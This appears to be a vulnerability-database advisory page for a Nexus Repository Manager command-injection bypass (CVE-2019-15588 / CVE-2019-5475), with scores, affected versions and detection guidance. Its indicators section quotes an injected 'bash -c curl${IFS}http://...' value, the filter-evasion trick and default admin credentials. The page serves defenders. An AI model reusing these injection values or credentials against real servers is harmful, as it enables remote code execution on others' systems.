cbcvebase.
CVE-2019-5475
published 2019-11-01

CVE-2019-5475: There is an OS Command Injection in Nexus Repository Manager <= 2.14.14 (bypass CVE-2019-5475) that could allow an attacker a Remote Code Execution (RCE). All…

PriorityP267high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
EPSS
18.40%
96.9th percentile
There is an OS Command Injection in Nexus Repository Manager <= 2.14.14 (bypass CVE-2019-5475) that could allow an attacker a Remote Code Execution (RCE). All instances using CommandLineExecutor.java with user-supplied data is vulnerable, such as the Yum Configuration Capability.

Affected

3 ranges
VendorProductVersion rangeFixed in
sonatypenexus_repository_manager<= 2.14.14
sonatypenexus_repository_manager
sonatypenexus_repository_manager2.0 – 2.14.9-01

Detection & IOCsextracted from sources · hover to see the quote

urlPUT /nexus/service/siesta/capabilities/000013ea3743a556
command/bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo
commandC:\Windows\System32\calc.exe
path/nexus/service/siesta/capabilities/
  • Monitor HTTP PUT requests to the Nexus REST API endpoint /nexus/service/siesta/capabilities/* for modifications to Yum Configuration capabilities, especially changes to 'createrepoPath' or 'mergerepoPath' fields containing shell metacharacters or unexpected binary paths.
  • Detect IFS-based space substitution (${IFS}) in HTTP request bodies targeting Nexus capability configuration endpoints, used to bypass the getCleanCommand filter introduced in the CVE-2019-5475 patch.
  • Alert on Nexus Repository Manager process spawning unexpected child processes (e.g. bash, curl, calc.exe) as SYSTEM or the Nexus service account, originating from CommandLineExecutor.java execution context.
  • Inspect XML payloads in PUT requests to Nexus capabilities API for the 'createrepoPath' property containing values other than a legitimate createrepo/mergerepo binary path.
  • ·The bypass (CVE-2019-15588) affects Nexus Repository Manager <= 2.14.14; the original CVE-2019-5475 patch introduced getCleanCommand() filtering which is incomplete and can be evaded using shell IFS substitution and logical operators.
  • ·Exploitation requires an authenticated user with sufficient privileges (e.g. admin) to create or edit Yum Configuration capabilities; the Authorization header in the PoC uses Basic auth with default admin:admin123 credentials.
  • ·On Windows, Nexus appends --version to the injected OS command, which may affect payload construction but does not prevent execution of the injected binary.

CVSS provenance

nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.